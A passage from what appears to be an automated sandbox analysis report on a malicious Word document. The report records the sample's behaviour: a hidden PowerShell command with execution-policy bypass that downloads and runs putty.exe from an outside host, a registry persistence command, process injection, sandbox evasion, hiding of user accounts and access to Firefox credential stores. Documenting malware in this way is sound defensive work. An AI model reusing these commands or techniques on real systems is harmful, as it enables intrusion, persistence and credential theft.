RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
        Source: putty.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: images.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Users\user\AppData\Roaming\putty.exeFile opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeFile opened: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe:Zone.Identifier read attributes | delete
        Hides user accounts
        Source: C:\ProgramData\images.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList eC.vaAf
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE Process information set: NOOPENFILEERRORBOX (2 occurrences)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (105 occurrences)
        Source: C:\Users\user\AppData\Roaming\putty.exe Process information set: NOOPENFILEERRORBOX (60 occurrences)
        Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX (3 occurrences)
        Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX (26 occurrences)
        Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (3 occurrences)
        Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\ProgramData\images.exe Process information set: NOOPENFILEERRORBOX (11 occurrences)
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe Process information set: NOOPENFILEERRORBOX (18 occurrences)
        Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Yara detected AntiVM3
        Source: Yara match | File source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: putty.exe, 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: putty.exe, 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_0040D8FB OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_0040D8FB OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\putty.exe | Thread delayed: delay time: 922337203685477
        Source: C:\ProgramData\images.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\cmd.exe | Window / User API: threadDelayed 709
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Window / User API: threadDelayed 8061
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Window / User API: threadDelayed 1448
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Window / User API: foregroundWindowGot 420
        Source: C:\ProgramData\images.exe | Dropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dll
        Source: C:\ProgramData\images.exe | Dropped PE file which has not been started: C:\Windows\System32\rfxvmt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2412 | Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2684 | Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2568 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3016 | Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2704 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 2972 | Thread sleep time: -44533s >= -30000s
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 1520 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 2984 | Thread sleep time: -42305s >= -30000s
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 1244 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\putty.exe TID: 2300 | Thread sleep count: 70 > 30
        Source: C:\ProgramData\images.exe TID: 152 | Thread sleep time: -46429s >= -30000s
        Source: C:\ProgramData\images.exe TID: 2620 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\ProgramData\images.exe TID: 1192 | Thread sleep count: 70 > 30
        Source: C:\ProgramData\images.exe TID: 2440 | Thread sleep time: -420000s >= -30000s
        Source: C:\Windows\SysWOW64\cmd.exe TID: 2752 | Thread sleep count: 709 > 30
        Source: C:\Windows\SysWOW64\cmd.exe TID: 2752 | Thread sleep time: -8508000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe TID: 2248 | Thread sleep time: -39409s >= -30000s
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe TID: 1480 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe TID: 1960 | Thread sleep time: -11068046444225724s >= -30000s
        Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed
        Source: C:\ProgramData\images.exe | Code function: 21_3_042397E0 GetSystemTime followed by cmp: cmp edx, 04h and CTI: jc 0423983Bh
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00411446 FindFirstFileW,FindNextFileW
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_00411446 FindFirstFileW,FindNextFileW
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW
        Source: C:\ProgramData\images.exe | Code function: 21_3_04239970 GetSystemInfo
        Source: C:\Users\user\AppData\Roaming\putty.exe | Thread delayed: delay time: 44533
        Source: C:\Users\user\AppData\Roaming\putty.exe | Thread delayed: delay time: 42305
        Source: C:\ProgramData\images.exe | Thread delayed: delay time: 46429
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Thread delayed: delay time: 39409
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp | Binary or memory string: vmware
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp | Binary or memory string: VMWARE
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
        Source: C:\ProgramData\images.exe | Code function: 21_3_0429723B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00426222 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_0041EB27 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00411B38 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00411B3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00411E6D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_00426222 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_0041EB27 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_00411B38 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_00411B3F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_00411E6D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00406045 GetProcessHeap,RtlAllocateHeap
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\putty.exe | Process token adjusted: Debug
        Source: C:\ProgramData\images.exe | Process token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Process token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\putty.exe | Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        Allocates memory in foreign processes
        Source: C:\ProgramData\images.exe | Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 120000 protect: page execute and read and write
        Source: C:\ProgramData\images.exe | Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 130000 protect: page read and write
        Bypasses PowerShell execution policy
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Contains functionality to inject threads in other processes
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_00407B2E OpenProcess,GetCurrentProcess,MessageBoxA,VirtualAllocEx,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_00407D5E OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_00413F7F RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread
        Creates a thread in another existing process (thread injection)
        Source: C:\ProgramData\images.exe | Thread created: C:\Windows\SysWOW64\cmd.exe EIP: 12010E
        Injects a PE file into a foreign processes
        Source: C:\Users\user\AppData\Roaming\putty.exe | Memory written: C:\Users\user\AppData\Roaming\putty.exe base: 400000 value starts with: 4D5A
        Source: C:\ProgramData\images.exe | Memory written: C:\ProgramData\images.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Memory written: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe base: 400000 value starts with: 4D5A
        Injects files into Windows application
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Injected file: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT was created by C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Windows\System32\notepad.exe | Injected file: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Writes to foreign memory regions
        Source: C:\ProgramData\images.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 120000
        Source: C:\ProgramData\images.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 130000
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_0041405F RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_0041405F RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exe | Process created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exe | Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\ProgramData\images.exe | Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\ProgramData\images.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
        Source: C:\ProgramData\images.exe | Process created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe 'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe'
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Process created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00412E91 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00410A8C AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid
        Source: images.exe | Binary or memory string: GetProgmanWindow
        Source: images.exe | Binary or memory string: SetProgmanWindow
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00410E5E cpuid
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
        Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE | Queries volume information: C:\Users\user\AppData\Local\Temp\OICE_9306262C-FECE-4A9E-949D-FCC308D5F5A8.0\FLD93F.tmp VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\ProgramData\images.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
        Source: C:\ProgramData\images.exeQueries volume information: C:\ VolumeInformation
        Source: C:\ProgramData\images.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
        Source: C:\ProgramData\images.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
        Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT VolumeInformation
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeQueries volume information: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe VolumeInformation
        Source: C:\Windows\System32\drvinst.exeQueries volume information: C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat VolumeInformation
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeQueries volume information: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00408D0F GetModuleHandleA,SHGetFolderPathW,lstrcatW,lstrcatW,CreateDirectoryW,lstrcpyW,lstrcatW,GetLocalTime,wsprintfW,CreateFileW,CloseHandle,RegisterClassW,CreateWindowExW,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,GetMessageA,13_2_00408D0F
        Source: C:\ProgramData\images.exeCode function: 21_3_042973C6 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,21_3_042973C6
        Source: C:\ProgramData\images.exeCode function: 21_3_042394E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,21_3_042394E0
        Source: C:\Users\user\AppData\Roaming\putty.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Increases the number of concurrent connections per server for Internet Explorer
Source: C:\Users\user\AppData\Roaming\putty.exe | Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Roaming\putty.exe | WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
